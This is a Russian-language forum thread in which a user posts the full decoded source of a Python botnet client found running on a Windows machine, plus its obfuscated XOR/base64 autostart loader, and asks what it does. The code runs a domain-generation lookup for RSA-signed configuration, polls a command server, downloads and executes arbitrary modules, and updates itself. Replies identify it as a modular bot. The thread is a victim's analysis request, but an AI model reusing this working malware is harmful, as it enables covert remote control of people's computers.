Подскажите что делает код (python)

Discussion in 'Песочница' started by traceme, 16 Sep 2015.

  1. traceme

    traceme Member

    Joined:
    11 Jun 2015
    Messages:
    34
    Likes Received:
    11
    Reputations:
    1
    Подскажите пожалуйста что делает этот код
    Code:
    import ctypes
    from ctypes import wintypes
    import subprocess
    from base64 import b64encode,b64decode
    import threading
    import traceback
    import hashlib
    import zipfile
    import urllib2
    import inspect
    import urllib
    import socket
    import shutil
    import ctypes
    import random
    import _winreg as winreg
    import types
    import json
    import time
    import rsa
    import sys
    import re
    import os
    _CreateMutex=ctypes.windll.kernel32.CreateMutexA
    _CreateMutex.argtypes=[wintypes.LPCVOID,wintypes.BOOL,wintypes.LPCSTR]
    _CreateMutex.restype=wintypes.HANDLE
    _GetLastError=ctypes.windll.kernel32.GetLastError
    _GetLastError.argtypes=[]
    _GetLastError.restype=wintypes.HANDLE
    class singleinstance:
    def __init__(self):self.mutexname='multivar_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}';self.mutex=_CreateMutex(None,False,self.mutexname);self.lasterror=_GetLastError()
    def aleradyrunning(self):return self.lasterror==183
    def __del__(self):
      if self.mutex:_CloseHandle(self.mutex)
    def chk_mutex():
    mutex=singleinstance();time.sleep(1)
    if mutex.aleradyrunning():sys.exit()
    class Http:
    def __init__(self,proxy=False,cookie_support=False,ua=False):
      self.handlers=set()
      if proxy:self.handlers|=set([urllib2.ProxyHandler({'http':proxy}),urllib2.HTTPBasicAuthHandler()])
      if cookie_support:self.handlers|=set([urllib2.HTTPCookieProcessor()])
      if self.handlers:self.interface=urllib2.build_opener(*self.handlers)
      else:self.interface=urllib2.build_opener(urllib2.BaseHandler)
      urllib2.install_opener(self.interface)
      if not ua:ua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'
      self.interface.addheaders=[('User-agent',ua)]
    def prepare_request(self,url,post=False,referer=False):
      request=urllib2.Request(url)
      if referer:request.add_header('Referer',referer)
      return request
    class Web:
    def __init__(self,proxy=False,cookie_support=False,ua=False,timeout=60):self.timeout=timeout;self.web=Http(proxy,cookie_support,ua)
    def fetch(self,url,data=False,referer=False):
      request=self.web.prepare_request(url,referer)
      if data:data=urllib.urlencode(data);response=self.web.interface.open(request,data,timeout=self.timeout)
      else:response=self.web.interface.open(request,timeout=self.timeout)
      return response
    class requests:
    class texter:
      def __init__(self,text):self.text=text
    @staticmethod
    def post(url,data=False,proxies=False,headers=False):
      if not proxies:proxies={'http':False}
      if not headers:headers={'User-Agent':False}
      resp=Web(proxy=proxies['http'],ua=headers['User-Agent']).fetch(url,data);return requests.texter(resp.read())
    @staticmethod
    def get(url,proxies=False,headers=False):return requests.post(url,proxies=proxies,headers=headers)
    def file_put_contents(fname,data):
    with open(fname,'wb') as f:f.write(data)
    def file_get_contents(fname):
    with open(fname,'rb') as f:return f.read()
    def extract_text(text,tag1,tag2):
    match=re.search('{}(.*?){}'.format(tag1,tag2),text,re.M|re.S)
    if match is None:return ''
    return match.group(1)
    def get_hard_id():
    try:k=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,'SOFTWARE\\Microsoft\\Cryptography');return winreg.QueryValueEx(k,'MachineGuid')[0].lower()
    except Exception as e:print(e);return os.popen('vol '+'c:','r').read().split()[-1].lower()
    def set_cur_dir(name):os.chdir(name)
    def get_script_dir():return os.path.dirname(os.path.realpath(__file__))
    def get_pseudo():
    alpha='qwertyuiopasdfghjklzxcvbnm1234567890';pseudo=''
    for i in range(9):pseudo=pseudo+random.choice(alpha)
    return pseudo
    def chk_sign(text):
    result=False
    try:public_data='LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JSUJDZ0tDQVFFQXZPbTlNeHg4RG5VbHZWNHdCOW93NUlPa3BNTzN1R2ZqTDE2aXlzdFRSVGMwQ3NQU2lFR00KMEJCUVlqY0wzSStORE9tMjhxLzBVWGVsMHFwdmtGQ0N6Y0FUVXJsOVlvUHpzbkpURnBGaUdYclArTi9IQzczZgpKV1pERWJCUW84L0ZVb1MvWW1oVTFXbkFjMzhVNUg1eFhqY0J0SkhWOHhmT0tmL2V5S1hKdmlFU0h6VHBVa2pTClJ6TDVTb2ZwZ3p0VU00cWc0NGFBOEF6blJSazlpcmp3VjErVHRhRzRQOXpFZ2JoZThOM0grOS9rT2pCK1dYOE8KNHlUbDhPdUVuNEV4Yy9TdysxcmFaL2x3QnFsUWlGdDFEUk05U2ZpU2lrNkJoSndBUnVpbmk0R3RjV3h3UDdROQpiM1dKL1JRdUZxQ0hSMVkzN0F0YlVLc1NzQjV5b0hyTDJRSURBUUFCCi0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K';public_data=b64decode(public_data);pubkey=rsa.PublicKey.load_pkcs1(public_data.encode());sign=extract_text(text,'<sign>','</sign>');sign=sign.decode('hex');data=extract_text(text,'<data>','</data>');data=b64decode(data);result=rsa.verify(data,sign,pubkey)
    except Exception as e:result=False
    return result
    def wait_for_internet():
    is_internet=False
    while not is_internet:
      try:sock=socket.create_connection(('google.com',80),timeout=30);is_internet=True;sock.close()
      except Exception as e:print(e);time.sleep(2)
    def import_code(code,name):module=types.ModuleType(name);exec(code,module.__dict__);return module
    def get_serv_data():
    random.seed(538479483);domains=['.net','.ru','.com','.in.ua','.ucoz.com','.ucoz.net','.ucoz.org','.ucoz.ru','.ucoz.ua','.ucoz.co.uk','.at.ua','.3dn.ru','.my1.ru','.clan.su','.moy.su','.do.am','.narod.ru','.3utilities.com','.bounceme.net','.ddns.net','.ddnsking.com','.gotdns.ch','.hopto.org','.myftp.biz','.myftp.org','.myvnc.com','.no-ip.biz','.no-ip.info','.no-ip.org','.noip.me','.redirectme.net','.servebeer.com','.serveblog.net','.servecounterstrike.com','.serveftp.com','.servegame.com','.servehalflife.com','.servehttp.com','.serveminecraft.net','.servemp3.com','.servepics.com','.servequake.com','.sytes.net','.webhop.me','.zapto.org'];wait_for_internet();rsa_config='';loop=True;iterator=0
    while loop:
      sub_domain=get_pseudo()
      for e in domains:
       domain=sub_domain+e;url='http://%s/%s.txt'%(domain,sub_domain);print('check url %s'%url);time.sleep(.1);text=do_request(url,domain)
       if chk_sign(text):rsa_config=text;loop=False;break
      iterator+=1
      if iterator>=100:iterator=0;random.seed(538479483)
      time.sleep(2)
    rsa_config=extract_text(text,'<data>','</data>');rsa_config=b64decode(rsa_config);print(rsa_config);main_config=extract_text(rsa_config,'<main>','</main>');ip=extract_text(main_config,'<ip>','</ip>');host=extract_text(main_config,'<host>','</host>');path=extract_text(main_config,'<path>','</path>');return rsa_config,ip,host,path
    def do_request(url,ip,data=False):
    try:
      proxy={'http':ip}
      if data:return requests.post(url,proxies=proxy,data=data).text
      return requests.get(url,proxies=proxy).text
    except Exception:return ''
    alive_modules={}
    def run_new_module(rsa_config,code,name):imported=import_code(code,name);alive_modules[name]=imported;thread=threading.Thread(target=imported.payload,args=(alive_modules[name],rsa_config));thread.start();return thread
    def stop_thread(module):alive_modules[module['name']].exit();module['thread'].join()
    def setup_import(imp):
    try:print(imp['name']);__import__(imp['name']);return
    except Exception as e:print(str(e))
    try:
      zip_s=requests.get(imp['url']).text
      with open(imp['name']+'.zip','wb') as f:f.write(zip_s)
      try:shutil.rmtree(imp['name'])
      except Exception as e:print(e)
      with zipfile.ZipFile(imp['name']+'.zip','r') as myzip:myzip.extractall()
      set_cur_dir(get_script_dir()+'\\'+imp['name']);os.popen('"'+sys.executable+'" '+'-X:FullFrames setup.py install');set_cur_dir(get_script_dir())
    except Exception as e:return False
    return True
    def main():
    time.sleep(10);chk_mutex();rsa_config='';set_cur_dir(get_script_dir());bot_id=get_hard_id();print('jmscbcsrkvureutlepd',bot_id);rsa_config,adminka_ip,adminka_host,adminka_path=get_serv_data();loaded_modules={}
    while True:
      post_data={}
      for k in loaded_modules:post_data[k]=loaded_modules[k]['hash']
      req_url='http://%s%s?h=%s&k=%s&do=get_modules'%(adminka_host,adminka_path,'jmscbcsrkvureutlepd',bot_id);print(post_data);resp=do_request(req_url,adminka_ip,data={'modules':json.dumps(post_data)});sleep=extract_text(resp,'<sleep>','</sleep>')
      if not sleep:sleep='7200'
      exception_text=''
      try:
       modules_head=extract_text(resp,'<py_head>','</py_head>')
       if modules_head:modules_head=json.loads(modules_head)
       else:modules_head=[]
       modules_codes=extract_text(resp,'<modules>','</modules>');update_code=extract_text(resp,'<update>','</update>')
       if update_code:print('Updating..');cur_script=os.path.realpath(__file__);code=b64decode(update_code);file_put_contents(cur_script,code);print('run ',[sys.executable,cur_script]);subprocess.Popen([sys.executable,cur_script],creationflags=8);sys.exit()
       for module in modules_head:
        print(module['name'])
        if module['name'] in loaded_modules:print('trying kill module '+module['name']);stop_thread(loaded_modules[module['name']]);loaded_modules.pop(module['name']);print('killed module '+module['name'])
        print('update imports');imports_result=True
        for imp in module['imports']:
         if not setup_import(imp):exception_text=exception_text+"I can't install "+imp['name']+'\n';imports_result=False;continue
        if not imports_result:continue
        print('load module');module_code=extract_text(modules_codes,'<'+module['name']+'>','</'+module['name']+'>');module_code=b64decode(module_code);module_thread=0
        if module['load_mode']=='thread':print('load module as thread');module_thread=run_new_module(rsa_config,module_code,module['name'])
        loaded_modules[module['name']]=module;loaded_modules[module['name']]['thread']=module_thread
      except Exception as e:exception_text=exception_text+traceback.format_exc()
      if len(exception_text)!=0:
       try:exception_text+='\n\n['+resp+']'
       except Exception as e:pass
       req_url='http://%s%s?h=%s&k=%s&do=traceback'%(adminka_host,adminka_path,'jmscbcsrkvureutlepd',bot_id);do_request(req_url,adminka_ip,data={'trace':exception_text})
      try:time.sleep(int(sleep))
      except Exception as e:time.sleep(7200)
    if __name__=='__main__':main()
    
     
  2. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Выглядит как бот с DGA и ассиметричным шифрованием
     
    _________________________
    traceme likes this.
  3. traceme

    traceme Member

    Joined:
    11 Jun 2015
    Messages:
    34
    Likes Received:
    11
    Reputations:
    1
    Спасибо! Если вам не сложно, подскажите, допустим если этот скрипт запущен от имени администратора на win системе - возможно ли хозяину ботнета послать команду на атаку фтп сервера?
    Вот сам скрипт, изначально на ironpython , с обфускацией, запускается через автозагрузку
    Code:
    import base64
    jdetiggavomna = ("").decode("hex")
    nlkyoie = ("67696a6a767572646b6867726470").decode("hex");ahuqradfermy = "";uzvjjthhg=0
    for fipzhkvresaeg in range(12856):
        ahuqradfermy = ahuqradfermy + chr(ord(jdetiggavomna[fipzhkvresaeg]) ^ ord(nlkyoie[uzvjjthhg]))
        uzvjjthhg = uzvjjthhg + 1
        if uzvjjthhg >= 14:
            uzvjjthhg = 0
    hwblqemivvbfqf = b64decode(ahuqradfermy)
    exec(hwblqemivvbfqf)

    Т.е. приведенный пример в первом посте это base64 decode скрипта в спойлере

    UPD
    Может поможет в моем вопросе - системный ДНС установлен абсолютно левый, не провайдер и даже не гугл, судя по адресу расположен в Украине
     
    #3 traceme, 17 Sep 2015
    Last edited: 17 Sep 2015
  4. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Именно хозяину ботнета или может ли хозяин ботнета?
     
    _________________________
    traceme likes this.
  5. traceme

    traceme Member

    Joined:
    11 Jun 2015
    Messages:
    34
    Likes Received:
    11
    Reputations:
    1
    Второй вариант. Может ли хозяин ботнета атаковать чужие фтп через компьютеры где запустили этот скрипт?
     
  6. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Бот умеет подгружать произвольные модули, владелец может что угодно делать
     
    _________________________
    traceme likes this.
  7. traceme

    traceme Member

    Joined:
    11 Jun 2015
    Messages:
    34
    Likes Received:
    11
    Reputations:
    1
    Вы мне очень сильно помогли, спасибо Вам огромное!
     
Loading...
Similar Threads - Подскажите делает python
  1. navai
    Replies:
    3
    Views:
    3,183